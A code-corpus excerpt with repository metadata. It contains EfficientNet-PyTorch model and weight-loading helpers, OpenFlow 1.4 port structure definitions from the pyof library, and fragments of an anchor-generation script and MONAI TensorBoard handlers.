    """Enumerate a set of anchors for each scale wrt an anchor."""
    w, h, x_ctr, y_ctr = _whctrs(anchor)
    # Scale width and height jointly; the center stays fixed.
    return _mkanchors(w * scales, h * scales, x_ctr, y_ctr)
if __name__ == '__main__':
    # Dev-only smoke test: time anchor generation, print the result,
    # then drop into an interactive shell for inspection.
    import time
    t = time.time()
    a = generate_anchors()
    print(time.time() - t)
    print(a)
    # NOTE(review): requires IPython at runtime — interactive convenience only.
    from IPython import embed;
    embed()
| 26.295082 | 78 | 0.545511 |
acdfb773177639b41313853775567c4a965fae36 | 12,095 | py | Python | efficientnet-pytorch/EfficientNet-PyTorch/EfficientNet-PyTorch-master/efficientnet_pytorch/utils.py | kozodoi/Kaggle_Blindness_Detection | 51bc0ed7a2d7c406dbcb40c7633730071a8823a6 | [
"MIT"
] | 12 | 2019-08-20T06:27:15.000Z | 2022-02-15T05:26:58.000Z | efficientnet-pytorch/EfficientNet-PyTorch/EfficientNet-PyTorch-master/efficientnet_pytorch/utils.py | kozodoi/Kaggle_Blindness_Detection | 51bc0ed7a2d7c406dbcb40c7633730071a8823a6 | [
"MIT"
] | null | null | null | efficientnet-pytorch/EfficientNet-PyTorch/EfficientNet-PyTorch-master/efficientnet_pytorch/utils.py | kozodoi/Kaggle_Blindness_Detection | 51bc0ed7a2d7c406dbcb40c7633730071a8823a6 | [
"MIT"
] | 7 | 2019-08-26T03:31:26.000Z | 2022-03-19T06:17:39.000Z | """
This file contains helper functions for building the model and for loading model parameters.
These helper functions are built to mirror those in the official TensorFlow implementation.
"""
import re
import math
import collections
from functools import partial
import torch
from torch import nn
from torch.nn import functional as F
from torch.utils import model_zoo
########################################################################
############### HELPERS FUNCTIONS FOR MODEL ARCHITECTURE ###############
########################################################################
# Parameters for the entire model (stem, all blocks, and head)
GlobalParams = collections.namedtuple('GlobalParams', [
    'batch_norm_momentum', 'batch_norm_epsilon', 'dropout_rate',
    'num_classes', 'width_coefficient', 'depth_coefficient',
    'depth_divisor', 'min_depth', 'drop_connect_rate', 'image_size'])
# Parameters for an individual model block
BlockArgs = collections.namedtuple('BlockArgs', [
    'kernel_size', 'num_repeat', 'input_filters', 'output_filters',
    'expand_ratio', 'id_skip', 'stride', 'se_ratio'])
# Change namedtuple defaults so that every field is optional and
# defaults to None (namedtuples have no per-field default syntax pre-3.7).
GlobalParams.__new__.__defaults__ = (None,) * len(GlobalParams._fields)
BlockArgs.__new__.__defaults__ = (None,) * len(BlockArgs._fields)
def relu_fn(x):
    """Swish activation function: x * sigmoid(x)."""
    return torch.mul(x, torch.sigmoid(x))
def round_filters(filters, global_params):
    """Calculate and round number of filters based on the width multiplier.

    Filters are scaled by ``width_coefficient`` and rounded to the nearest
    multiple of ``depth_divisor``, never dropping below ``min_depth`` nor
    below 90% of the scaled value.
    """
    multiplier = global_params.width_coefficient
    if not multiplier:
        # No width scaling configured: keep the original filter count.
        return filters
    divisor = global_params.depth_divisor
    floor = global_params.min_depth or divisor
    scaled = filters * multiplier
    rounded = max(floor, int(scaled + divisor / 2) // divisor * divisor)
    if rounded < 0.9 * scaled:  # prevent rounding down by more than 10%
        rounded += divisor
    return int(rounded)
def round_repeats(repeats, global_params):
    """Round number of block repeats based on the depth multiplier (ceil)."""
    multiplier = global_params.depth_coefficient
    # No depth scaling configured: keep the original repeat count.
    return repeats if not multiplier else int(math.ceil(multiplier * repeats))
def drop_connect(inputs, p, training):
    """Drop connect: randomly zero whole samples with probability ``p`` and
    rescale the survivors by 1/(1-p). Identity when not training.
    """
    if not training:
        return inputs
    keep_prob = 1 - p
    batch_size = inputs.shape[0]
    # One Bernoulli(keep_prob) draw per sample, broadcast over C/H/W.
    noise = torch.rand([batch_size, 1, 1, 1], dtype=inputs.dtype, device=inputs.device)
    binary_mask = torch.floor(keep_prob + noise)
    return inputs / keep_prob * binary_mask
def get_same_padding_conv2d(image_size=None):
    """Choose static padding if an image size is specified, dynamic otherwise.
    Static padding is necessary for ONNX exporting of models.
    """
    if image_size is not None:
        return partial(Conv2dStaticSamePadding, image_size=image_size)
    return Conv2dDynamicSamePadding
class Conv2dDynamicSamePadding(nn.Conv2d):
    """2D convolution with TensorFlow-like 'SAME' padding, computed per
    forward pass so it works for any input image size.
    """

    def __init__(self, in_channels, out_channels, kernel_size, stride=1, dilation=1, groups=1, bias=True):
        # Base conv is created with zero padding; padding is applied manually.
        super().__init__(in_channels, out_channels, kernel_size, stride, 0, dilation, groups, bias)
        if len(self.stride) != 2:
            self.stride = [self.stride[0]] * 2

    def forward(self, x):
        in_h, in_w = x.size()[-2:]
        kernel_h, kernel_w = self.weight.size()[-2:]
        stride_h, stride_w = self.stride
        # TF 'SAME': output size is ceil(input / stride).
        out_h = math.ceil(in_h / stride_h)
        out_w = math.ceil(in_w / stride_w)
        pad_h = max((out_h - 1) * stride_h + (kernel_h - 1) * self.dilation[0] + 1 - in_h, 0)
        pad_w = max((out_w - 1) * stride_w + (kernel_w - 1) * self.dilation[1] + 1 - in_w, 0)
        if pad_h > 0 or pad_w > 0:
            # Split padding as evenly as possible; the extra pixel goes last.
            x = F.pad(x, [pad_w // 2, pad_w - pad_w // 2, pad_h // 2, pad_h - pad_h // 2])
        return F.conv2d(x, self.weight, self.bias, self.stride, self.padding, self.dilation, self.groups)
class Conv2dStaticSamePadding(nn.Conv2d):
    """2D convolution with TensorFlow-like 'SAME' padding, precomputed in the
    constructor for a fixed image size (required for ONNX export).
    """

    def __init__(self, in_channels, out_channels, kernel_size, image_size=None, **kwargs):
        super().__init__(in_channels, out_channels, kernel_size, **kwargs)
        if len(self.stride) != 2:
            self.stride = [self.stride[0]] * 2

        # Precompute the padding from the (mandatory) fixed image size.
        assert image_size is not None
        in_h, in_w = image_size if type(image_size) == list else [image_size, image_size]
        kernel_h, kernel_w = self.weight.size()[-2:]
        stride_h, stride_w = self.stride
        out_h, out_w = math.ceil(in_h / stride_h), math.ceil(in_w / stride_w)
        pad_h = max((out_h - 1) * stride_h + (kernel_h - 1) * self.dilation[0] + 1 - in_h, 0)
        pad_w = max((out_w - 1) * stride_w + (kernel_w - 1) * self.dilation[1] + 1 - in_w, 0)
        if pad_h > 0 or pad_w > 0:
            self.static_padding = nn.ZeroPad2d(
                (pad_w // 2, pad_w - pad_w // 2, pad_h // 2, pad_h - pad_h // 2))
        else:
            # No padding needed for this geometry: use a pass-through module.
            self.static_padding = nn.Identity()

    def forward(self, x):
        padded = self.static_padding(x)
        return F.conv2d(padded, self.weight, self.bias, self.stride,
                        self.padding, self.dilation, self.groups)
class Identity(nn.Module):
    """Pass-through module: ``forward`` returns its input unchanged."""

    def __init__(self):
        super(Identity, self).__init__()

    def forward(self, input):
        # Intentionally a no-op.
        return input
########################################################################
############## HELPERS FUNCTIONS FOR LOADING MODEL PARAMS ##############
########################################################################
def efficientnet_params(model_name):
    """Map an EfficientNet model name to its parameter coefficients.

    Returns:
        (width_coefficient, depth_coefficient, resolution, dropout_rate)

    Raises:
        KeyError: if ``model_name`` is not a known EfficientNet variant.
    """
    coefficients = {
        'efficientnet-b0': (1.0, 1.0, 224, 0.2),
        'efficientnet-b1': (1.0, 1.1, 240, 0.2),
        'efficientnet-b2': (1.1, 1.2, 260, 0.3),
        'efficientnet-b3': (1.2, 1.4, 300, 0.3),
        'efficientnet-b4': (1.4, 1.8, 380, 0.4),
        'efficientnet-b5': (1.6, 2.2, 456, 0.4),
        'efficientnet-b6': (1.8, 2.6, 528, 0.5),
        'efficientnet-b7': (2.0, 3.1, 600, 0.5),
    }
    return coefficients[model_name]
class BlockDecoder(object):
    """Block Decoder for readability, straight from the official TensorFlow
    repository. Converts between BlockArgs namedtuples and compact string
    notations such as ``'r1_k3_s11_e1_i32_o16_se0.25'``.
    """

    @staticmethod
    def _decode_block_string(block_string):
        """Get a BlockArgs from a string notation of arguments."""
        assert isinstance(block_string, str)

        ops = block_string.split('_')
        options = {}
        for op in ops:
            # Split each token into a letter key and numeric value,
            # e.g. 'k3' -> ('k', '3'), 'se0.25' -> ('se', '0.25').
            splits = re.split(r'(\d.*)', op)
            if len(splits) >= 2:
                key, value = splits[:2]
                options[key] = value

        # Check stride: either a single char ('s2') or two equal chars ('s22').
        assert (('s' in options and len(options['s']) == 1) or
                (len(options['s']) == 2 and options['s'][0] == options['s'][1]))

        return BlockArgs(
            kernel_size=int(options['k']),
            num_repeat=int(options['r']),
            input_filters=int(options['i']),
            output_filters=int(options['o']),
            expand_ratio=int(options['e']),
            id_skip=('noskip' not in block_string),
            se_ratio=float(options['se']) if 'se' in options else None,
            stride=[int(options['s'][0])])

    @staticmethod
    def _encode_block_string(block):
        """Encode a BlockArgs to a string (inverse of _decode_block_string)."""
        args = [
            'r%d' % block.num_repeat,
            'k%d' % block.kernel_size,
            # BUG FIX: BlockArgs declares a single-element `stride` list (see
            # _decode_block_string); the previous `block.strides[0]` /
            # `block.strides[1]` accessed a nonexistent attribute and raised
            # AttributeError. The stride is emitted twice ('sNN') to mirror
            # the decoded notation.
            's%d%d' % (block.stride[0], block.stride[0]),
            'e%s' % block.expand_ratio,
            'i%d' % block.input_filters,
            'o%d' % block.output_filters
        ]
        # BUG FIX: se_ratio may be None (decode stores None when absent);
        # guard it so the chained comparison does not raise TypeError.
        if block.se_ratio is not None and 0 < block.se_ratio <= 1:
            args.append('se%s' % block.se_ratio)
        if block.id_skip is False:
            args.append('noskip')
        return '_'.join(args)

    @staticmethod
    def decode(string_list):
        """
        Decode a list of string notations to specify blocks inside the network.

        :param string_list: a list of strings, each string is a notation of block
        :return: a list of BlockArgs namedtuples of block args
        """
        assert isinstance(string_list, list)
        blocks_args = []
        for block_string in string_list:
            blocks_args.append(BlockDecoder._decode_block_string(block_string))
        return blocks_args

    @staticmethod
    def encode(blocks_args):
        """
        Encode a list of BlockArgs to a list of strings.

        :param blocks_args: a list of BlockArgs namedtuples of block args
        :return: a list of strings, each string is a notation of block
        """
        block_strings = []
        for block in blocks_args:
            block_strings.append(BlockDecoder._encode_block_string(block))
        return block_strings
def efficientnet(width_coefficient=None, depth_coefficient=None, dropout_rate=0.2,
                 drop_connect_rate=0.2, image_size=None, num_classes=1000):
    """Create the (blocks_args, global_params) pair for an EfficientNet model."""
    # Baseline (B0) architecture, one notation string per stage.
    block_strings = [
        'r1_k3_s11_e1_i32_o16_se0.25', 'r2_k3_s22_e6_i16_o24_se0.25',
        'r2_k5_s22_e6_i24_o40_se0.25', 'r3_k3_s22_e6_i40_o80_se0.25',
        'r3_k5_s11_e6_i80_o112_se0.25', 'r4_k5_s22_e6_i112_o192_se0.25',
        'r1_k3_s11_e6_i192_o320_se0.25',
    ]
    blocks_args = BlockDecoder.decode(block_strings)

    global_params = GlobalParams(
        batch_norm_momentum=0.99,
        batch_norm_epsilon=1e-3,
        dropout_rate=dropout_rate,
        drop_connect_rate=drop_connect_rate,
        # data_format='channels_last', # removed, this is always true in PyTorch
        num_classes=num_classes,
        width_coefficient=width_coefficient,
        depth_coefficient=depth_coefficient,
        depth_divisor=8,
        min_depth=None,
        image_size=image_size,
    )
    return blocks_args, global_params
def get_model_params(model_name, override_params):
    """Get the block args and global params for a given model name.

    Raises:
        NotImplementedError: if ``model_name`` is not an EfficientNet variant.
    """
    if not model_name.startswith('efficientnet'):
        raise NotImplementedError('model name is not pre-defined: %s' % model_name)
    width, depth, resolution, dropout = efficientnet_params(model_name)
    # Note: all models use drop connect rate = 0.2.
    blocks_args, global_params = efficientnet(
        width_coefficient=width, depth_coefficient=depth,
        dropout_rate=dropout, image_size=resolution)
    if override_params:
        # _replace raises ValueError for fields not present in GlobalParams.
        global_params = global_params._replace(**override_params)
    return blocks_args, global_params
# Download URLs for the official pretrained checkpoints, keyed by model name.
# Used by load_pretrained_weights via torch.utils.model_zoo.
url_map = {
    'efficientnet-b0': 'http://storage.googleapis.com/public-models/efficientnet/efficientnet-b0-355c32eb.pth',
    'efficientnet-b1': 'http://storage.googleapis.com/public-models/efficientnet/efficientnet-b1-f1951068.pth',
    'efficientnet-b2': 'http://storage.googleapis.com/public-models/efficientnet/efficientnet-b2-8bb594d6.pth',
    'efficientnet-b3': 'http://storage.googleapis.com/public-models/efficientnet/efficientnet-b3-5fb5a3c3.pth',
    'efficientnet-b4': 'http://storage.googleapis.com/public-models/efficientnet/efficientnet-b4-6ed6700e.pth',
    'efficientnet-b5': 'http://storage.googleapis.com/public-models/efficientnet/efficientnet-b5-b6417697.pth',
    'efficientnet-b6': 'http://storage.googleapis.com/public-models/efficientnet/efficientnet-b6-c76e70fd.pth',
    'efficientnet-b7': 'http://storage.googleapis.com/public-models/efficientnet/efficientnet-b7-dcc49843.pth',
}
def load_pretrained_weights(model, model_name, load_fc=True):
    """Load pretrained weights into ``model``, downloading them on first use.

    When ``load_fc`` is False the final fully-connected layer weights are
    dropped from the checkpoint (useful when fine-tuning on a different
    number of classes).
    """
    state_dict = model_zoo.load_url(url_map[model_name])
    if not load_fc:
        state_dict.pop('_fc.weight')
        state_dict.pop('_fc.bias')
        res = model.load_state_dict(state_dict, strict=False)
        # Only the FC weights may be missing after the partial load.
        assert str(res.missing_keys) == str(['_fc.weight', '_fc.bias']), 'issue loading pretrained weights'
    else:
        model.load_state_dict(state_dict)
    print('Loaded pretrained weights for {}'.format(model_name))
| 40.316667 | 112 | 0.638198 |
acdfb7f66ca391eb61e26ffe487bdb1386aeac33 | 15,160 | py | Python | pyof/v0x05/common/port.py | RoyAl82/VIPProject | 1bfe7929d1e2dc663e3c30f6a0685224ca319618 | [
"MIT"
] | null | null | null | pyof/v0x05/common/port.py | RoyAl82/VIPProject | 1bfe7929d1e2dc663e3c30f6a0685224ca319618 | [
"MIT"
] | null | null | null | pyof/v0x05/common/port.py | RoyAl82/VIPProject | 1bfe7929d1e2dc663e3c30f6a0685224ca319618 | [
"MIT"
] | null | null | null | """Defines physical port classes and related items."""
# System imports
from enum import IntEnum
# Local source tree imports
from pyof.foundation.base import GenericBitMask, GenericStruct
from pyof.foundation.basic_types import (Char, FixedTypeList, HWAddress, Pad, UBInt32, UBInt16, UBInt8)
from pyof.foundation.constants import OFP_MAX_PORT_NAME_LEN, OFP_ETH_ALEN
# Third-party imports
__all__ = ('ListOfPorts', 'Port', 'PortNo', 'PortConfig', 'PortFeatures',
'PortState')
class PortNo(IntEnum):
    """Port numbering.

    Physical and logical ports are numbered starting from 1; values at or
    above :attr:`OFPP_MAX` are reserved OpenFlow ports.
    """

    #: Maximum number of physical and logical switch ports.
    OFPP_MAX = 0xffffff00

    # Reserved OpenFlow port (fake output "ports")

    #: Send the packet out the input port. This reserved port must be
    #: explicitly used in order to send back out of the input port.
    OFPP_IN_PORT = 0xfffffff8

    #: Submit the packet to the first flow table
    #: NB: This destination port can only be used in packet-out messages.
    OFPP_TABLE = 0xfffffff9

    #: Process with normal L2/L3 switching.
    OFPP_NORMAL = 0xfffffffa

    #: All physical ports in VLAN, except input port and those blocked or link
    #: down.
    OFPP_FLOOD = 0xfffffffb

    #: All physical ports except input port
    OFPP_ALL = 0xfffffffc

    #: Send to controller
    OFPP_CONTROLLER = 0xfffffffd

    #: Local openflow "port"
    OFPP_LOCAL = 0xfffffffe

    #: Wildcard port used only for flow mod (delete) and flow stats requests.
    #: Selects all flows regardless of output port (including flows with no
    #: output port).
    OFPP_ANY = 0xffffffff
class PortDescPropType(IntEnum):
    """Port description property types (``ofp_port_desc_prop_type``)."""

    #: Ethernet property.
    OFPPDPT_ETHERNET = 0
    #: Optical property.
    OFPPDPT_OPTICAL = 1
    #: Experimenter property.
    #: BUG FIX: the OpenFlow 1.4 spec defines OFPPDPT_EXPERIMENTER as 0xFFFF;
    #: the previous value 0xfff dropped one hex digit.
    OFPPDPT_EXPERIMENTER = 0xffff
class OpticalPortFeatures(GenericBitMask):
    """Features of optical ports available in the switch (bitmap of
    ``OFPOPF_*`` flags, used in :class:`PortDescPropOptical.supported`)."""

    #: Receiver is tunable.
    OFPOPF_RX_TUNE = 1 << 0
    #: Transmit is tunable.
    OFPOPF_TX_TUNE = 1 << 1
    #: Power is configurable.
    OFPOPF_TX_PWR = 1 << 2
    #: Use Frequency, not wavelength.
    OFPOPF_USE_FREQ = 1 << 3
class PortConfig(GenericBitMask):
    """Flags to indicate behavior of the physical port.

    These flags are used in :class:`Port` to describe the current
    configuration. They are used in the
    :class:`~pyof.v0x05.controller2switch.port_mod.PortMod`
    message to configure the port's behavior.

    The :attr:`OFPPC_PORT_DOWN` bit indicates that the port has been
    administratively brought down and should not be used by OpenFlow. The
    :attr:`~OFPPC_NO_RECV` bit indicates that packets received on that port
    should be ignored. The :attr:`OFPPC_NO_FWD` bit indicates that OpenFlow
    should not send packets to that port. The :attr:`OFPPC_NO_PACKET_IN` bit
    indicates that packets on that port that generate a table miss should never
    trigger a packet-in message to the controller.

    In general, the port config bits are set by the controller and not changed
    by the switch. Those bits may be useful for the controller to implement
    protocols such as STP or BFD. If the port config bits are changed by the
    switch through another administrative interface, the switch sends an
    :attr:`OFPT_PORT_STATUS` message to notify the controller of the change.
    """

    #: Port is administratively down.
    OFPPC_PORT_DOWN = 1 << 0
    #: Drop all packets received by port.
    OFPPC_NO_RECV = 1 << 2
    #: Drop packets forwarded to port.
    OFPPC_NO_FWD = 1 << 5
    #: Do not send packet-in msgs for port.
    OFPPC_NO_PACKET_IN = 1 << 6
    # NOTE(review): bit positions 1, 3 and 4 are deliberately unused here
    # (presumably reserved by the protocol) — the gaps are intentional.
class PortFeatures(GenericBitMask):
    """Physical port features (bitmap of ``OFPPF_*`` flags).

    These bit positions are used by the ``curr``, ``advertised``,
    ``supported`` and ``peer`` fields of :class:`PortDescPropEthernet`; they
    indicate link modes (speed and duplexity), link type (copper/fiber) and
    link features (autonegotiation and pause).

    Multiple of these flags may be set simultaneously. If none of the port
    speed flags are set, the max_speed or curr_speed are used.

    The curr_speed and max_speed fields indicate the current and maximum bit
    rate (raw transmission speed) of the link in kbps. The number should be
    rounded to match common usage. For example, an optical 10 Gb Ethernet port
    should have this field set to 10000000 (instead of 10312500), and an OC-192
    port should have this field set to 10000000 (instead of 9953280).

    The max_speed fields indicate the maximum configured capacity of the link,
    whereas the curr_speed indicates the current capacity. If the port is a LAG
    with 3 links of 1Gb/s capacity, with one of the ports of the LAG being
    down, one port auto-negotiated at 1Gb/s and 1 port auto-negotiated at
    100Mb/s, the max_speed is 3 Gb/s and the curr_speed is 1.1 Gb/s.
    """

    #: 10 Mb half-duplex rate support.
    OFPPF_10MB_HD = 1 << 0
    #: 10 Mb full-duplex rate support.
    OFPPF_10MB_FD = 1 << 1
    #: 100 Mb half-duplex rate support.
    OFPPF_100MB_HD = 1 << 2
    #: 100 Mb full-duplex rate support.
    OFPPF_100MB_FD = 1 << 3
    #: 1 Gb half-duplex rate support.
    OFPPF_1GB_HD = 1 << 4
    #: 1 Gb full-duplex rate support.
    OFPPF_1GB_FD = 1 << 5
    #: 10 Gb full-duplex rate support.
    OFPPF_10GB_FD = 1 << 6
    #: 40 Gb full-duplex rate support.
    OFPPF_40GB_FD = 1 << 7
    #: 100 Gb full-duplex rate support.
    OFPPF_100GB_FD = 1 << 8
    #: 1 Tb full-duplex rate support.
    OFPPF_1TB_FD = 1 << 9
    #: Other rate, not in the list.
    OFPPF_OTHER = 1 << 10
    #: Copper medium.
    OFPPF_COPPER = 1 << 11
    #: Fiber medium.
    OFPPF_FIBER = 1 << 12
    #: Auto-negotiation.
    OFPPF_AUTONEG = 1 << 13
    #: Pause.
    OFPPF_PAUSE = 1 << 14
    #: Asymmetric pause.
    OFPPF_PAUSE_ASYM = 1 << 15
class PortState(GenericBitMask):
    """Current state of the physical port.

    These are not configurable from the controller.

    The port state bits represent the state of the physical link or switch
    protocols outside of OpenFlow. The :attr:`OFPPS_LINK_DOWN` bit indicates
    that the physical link is not present. The :attr:`OFPPS_BLOCKED` bit
    indicates that a switch protocol outside of OpenFlow, such as 802.1D
    Spanning Tree, is preventing the use of that port with
    :attr:`PortNo.OFPP_FLOOD`.

    All port state bits are read-only and cannot be changed by the controller.
    When the port flags are changed, the switch sends an
    :attr:`v0x05.common.header.Type.OFPT_PORT_STATUS` message to notify the
    controller of the change.
    """

    #: No physical link present.
    OFPPS_LINK_DOWN = 1 << 0
    #: Port is blocked.
    OFPPS_BLOCKED = 1 << 1
    #: Live for Fast Failover Group.
    OFPPS_LIVE = 1 << 2
# Classes
class Port(GenericStruct):
    """Description of a port.

    The :attr:`port_no` field uniquely identifies a port within a switch. The
    :attr:`hw_addr` field typically is the MAC address for the port;
    :data:`.OFP_ETH_ALEN` is 6. The :attr:`name` field is a null-terminated
    string containing a human-readable name for the interface; the value of
    :data:`.OFP_MAX_PORT_NAME_LEN` is 16.

    :attr:`config` and :attr:`state` are bitmaps of :class:`PortConfig` and
    :class:`PortState` values respectively. Link speed and feature
    information lives in the port description properties (see
    :class:`PortDescPropEthernet`) rather than on this struct.

    NOTE(review): field declaration order defines the wire format of this
    struct — do not reorder the class attributes below.
    """

    port_no = UBInt32()
    length = UBInt16()
    pad = Pad(2)
    hw_addr = HWAddress()
    pad2 = Pad(2)  # Align to 64 bits
    name = Char(length=OFP_MAX_PORT_NAME_LEN)  # Null terminated
    config = UBInt32(enum_ref=PortConfig)  # Bitmap of OFPPC_* flags
    state = UBInt32(enum_ref=PortState)  # Bitmap of OFPPS_* flags

    """
    These are not existed in version 1.4 specifications
    curr = UBInt32(enum_ref=PortFeatures)
    advertised = UBInt32(enum_ref=PortFeatures)
    supported = UBInt32(enum_ref=PortFeatures)
    peer = UBInt32(enum_ref=PortFeatures)
    curr_speed = UBInt32()
    max_speed = UBInt32()
    """

    def __init__(self, port_no=None, hw_addr=None, name=None, config=None,
                 state=None):
        """Create a Port with the optional parameters below.

        Args:
            port_no (int): Port number.
            hw_addr (HWAddress): Hardware address.
            name (str): Null-terminated name.
            config (~pyof.v0x05.common.port.PortConfig):
                Bitmap of OFPPC* flags.
            state (~pyof.v0x05.common.port.PortState): Bitmap of OFPPS* flags.
        """
        super().__init__()
        self.port_no = port_no
        self.hw_addr = hw_addr
        self.name = name
        self.config = config
        self.state = state
class PortDescPropHeader(GenericStruct):
    """Common header for all port description properties.

    NOTE(review): field declaration order defines the wire format — do not
    reorder the class attributes below.
    """

    #: One of OFPPDPT_*.
    type = UBInt16()
    #: Length in bytes of this property.
    length = UBInt16()

    def __init__(self, type=None, length=None):
        """Create the header for port description properties.

        Args:
            type (PortDescPropType): The port description property type.
            length (int): Length in bytes of this property.
        """
        # BUG FIX: chain to GenericStruct so base-class initialization runs,
        # consistent with Port.__init__ in this module.
        super().__init__()
        self.type = type
        self.length = length
class PortDescPropEthernet(PortDescPropHeader):
    """Ethernet port description property (OFPPDPT_ETHERNET)."""

    # Align to 64 bits
    pad4 = Pad(4)

    """ Bitmaps of OFPPF_* that describe features. All bits zeroed if
    unsupported or unavailable. """
    #: Current features.
    curr = UBInt32(enum_ref=PortFeatures)
    #: Features being advertised by the port.
    advertised = UBInt32(enum_ref=PortFeatures)
    #: Features supported by the port.
    supported = UBInt32(enum_ref=PortFeatures)
    #: Features advertised by the peer.
    peer = UBInt32(enum_ref=PortFeatures)
    #: Current port bitrate in kbps.
    curr_speed = UBInt32()
    #: Max port bitrate in kbps.
    max_speed = UBInt32()

    # BUG FIX: defaults were `curr=PortFeatures` (and likewise for advertised/
    # supported/peer), binding the enum *class itself* as the default value.
    # They now default to None like the sibling property classes.
    def __init__(self, curr=None, advertised=None, supported=None, peer=None,
                 curr_speed=None, max_speed=None):
        """Create the Port Description Property for Ethernet.

        Args:
            curr (PortFeatures): Current features.
            advertised (PortFeatures): Features being advertised by the port.
            supported (PortFeatures): Features supported by the port.
            peer (PortFeatures): Features advertised by the peer.
            curr_speed (int): Current port bitrate in kbps.
            max_speed (int): Max port bitrate in kbps.
        """
        super().__init__(type=PortDescPropType.OFPPDPT_ETHERNET)
        self.curr = curr
        self.advertised = advertised
        self.supported = supported
        self.peer = peer
        self.curr_speed = curr_speed
        self.max_speed = max_speed
        self.length = self.__sizeof__()
class PortDescPropOptical(PortDescPropHeader):
    """Optical port description property (OFPPDPT_OPTICAL).

    NOTE(review): field declaration order defines the wire format — do not
    reorder the class attributes below.
    """

    #: Align to 64 bits.
    pad4 = Pad(4)
    #: Features supported by the port (bitmap; see OpticalPortFeatures).
    supported = UBInt32()
    #: Minimum TX Frequency/Wavelength.
    tx_min_freq_lmda = UBInt32()
    #: Maximum TX Frequency/Wavelength.
    tx_max_freq_lmda = UBInt32()
    #: TX Grid Spacing Frequency/Wavelength.
    tx_grid_freq_lmda = UBInt32()
    #: Minimum RX Frequency/Wavelength.
    rx_min_freq_lmda = UBInt32()
    #: Maximum RX Frequency/Wavelength.
    rx_max_freq_lmda = UBInt32()
    #: RX Grid Spacing Frequency/Wavelength.
    rx_grid_freq_lmda = UBInt32()
    #: Minimum TX power.
    tx_pwr_min = UBInt16()
    #: Maximum TX power.
    tx_pwr_max = UBInt16()

    def __init__(self, supported=None, tx_min_freq_lmda=None, tx_max_freq_lmda=None,
                 tx_grid_freq_lmda=None, rx_min_freq_lmda=None, rx_max_freq_lmda=None,
                 rx_grid_freq_lmda=None, tx_pwr_min=None, tx_pwr_max=None):
        """Create the Port Description Property for Optical ports.

        Args:
            supported: Features supported by the port.
            tx_min_freq_lmda: Minimum TX Frequency/Wavelength.
            tx_max_freq_lmda: Maximum TX Frequency/Wavelength.
            tx_grid_freq_lmda: TX Grid Spacing Frequency/Wavelength.
            rx_min_freq_lmda: Minimum RX Frequency/Wavelength.
            rx_max_freq_lmda: Maximum RX Frequency/Wavelength.
            rx_grid_freq_lmda: RX Grid Spacing Frequency/Wavelength.
            tx_pwr_min: Minimum TX power.
            tx_pwr_max: Maximum TX power.
        """
        super().__init__(type=PortDescPropType.OFPPDPT_OPTICAL)
        self.supported = supported
        self.tx_min_freq_lmda = tx_min_freq_lmda
        self.tx_max_freq_lmda = tx_max_freq_lmda
        self.tx_grid_freq_lmda = tx_grid_freq_lmda
        self.rx_grid_freq_lmda = rx_grid_freq_lmda
        self.rx_min_freq_lmda = rx_min_freq_lmda
        self.rx_max_freq_lmda = rx_max_freq_lmda
        self.tx_pwr_min = tx_pwr_min
        self.tx_pwr_max = tx_pwr_max
        self.length = self.__sizeof__()
class PortDescPropExperimenter(PortDescPropHeader):
    """Experimenter port description property (OFPPDPT_EXPERIMENTER)."""

    #: Experimenter ID, which takes the same form as in ExperimenterHeader.
    #: BUG FIX: the OpenFlow 1.4 ofp_port_desc_prop_experimenter struct
    #: declares this as uint32; it was previously declared as UBInt16.
    experimenter = UBInt32()
    #: Experimenter defined (uint32 per the OpenFlow 1.4 spec).
    exp_type = UBInt32()

    """ Followed by:
    - Exactly (length - 12) bytes containing the experimenter data, then
    - Exactly (length + 7) / 8 * 8 - (length) (between 0 and 7) bytes
    of all-zero bytes.
    """
    # NOTE(review): experimenter data is variable-length on the wire; a fixed
    # UBInt32 field only covers the 4-byte case — confirm against callers.
    experimenterData = UBInt32(0)

    def __init__(self, experimenter=None, exp_type=None, experimenterData=None):
        """Create the Port Description Property for Experimenter.

        Args:
            experimenter: Experimenter ID, same form as in ExperimenterHeader.
            exp_type: Experimenter defined type.
            experimenterData: Experimenter data.

        Followed by:
        - Exactly (length - 12) bytes containing the experimenter data, then
        - Exactly (length + 7) / 8 * 8 - (length) (between 0 and 7) bytes
        of all-zero bytes.
        """
        super().__init__(type=PortDescPropType.OFPPDPT_EXPERIMENTER)
        self.experimenter = experimenter
        self.exp_type = exp_type
        self.experimenterData = experimenterData
class ListOfPorts(FixedTypeList):
    """List of Ports.

    Represented by instances of :class:`Port` and used on
    :class:`~pyof.v0x05.controller2switch.features_reply.FeaturesReply`/
    :class:`~pyof.v0x05.controller2switch.features_reply.SwitchFeatures`
    objects.
    """

    def __init__(self, items=None):
        """Create a ListOfPorts with the optional parameters below.

        Args:
            items (:class:`list`, :class:`~pyof.v0x05.common.port.Port`):
                One :class:`~pyof.v0x05.common.port.Port` instance or a list
                of them.
        """
        super().__init__(pyof_class=Port,
                         items=items)
| 35.670588 | 143 | 0.678232 |
acdfb84c8c310a242a9aafeef15d301a4b3b8012 | 14,863 | py | Python | monai/handlers/tensorboard_handlers.py | leotam/MONAI | 866d53df3f754e25fb4635abeb3f27cdaaa718cd | [
"Apache-2.0"
] | null | null | null | monai/handlers/tensorboard_handlers.py | leotam/MONAI | 866d53df3f754e25fb4635abeb3f27cdaaa718cd | [
"Apache-2.0"
] | null | null | null | monai/handlers/tensorboard_handlers.py | leotam/MONAI | 866d53df3f754e25fb4635abeb3f27cdaaa718cd | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import warnings
from typing import TYPE_CHECKING, Any, Callable, Optional
import numpy as np
import torch
from monai.utils import exact_version, is_scalar, optional_import
from monai.visualize import plot_2d_or_3d_image
Events, _ = optional_import("ignite.engine", "0.4.2", exact_version, "Events")
if TYPE_CHECKING:
from ignite.engine import Engine
from torch.utils.tensorboard import SummaryWriter
else:
Engine, _ = optional_import("ignite.engine", "0.4.2", exact_version, "Engine")
SummaryWriter, _ = optional_import("torch.utils.tensorboard", name="SummaryWriter")
DEFAULT_TAG = "Loss"
class TensorBoardStatsHandler:
"""
TensorBoardStatsHandler defines a set of Ignite Event-handlers for all the TensorBoard logics.
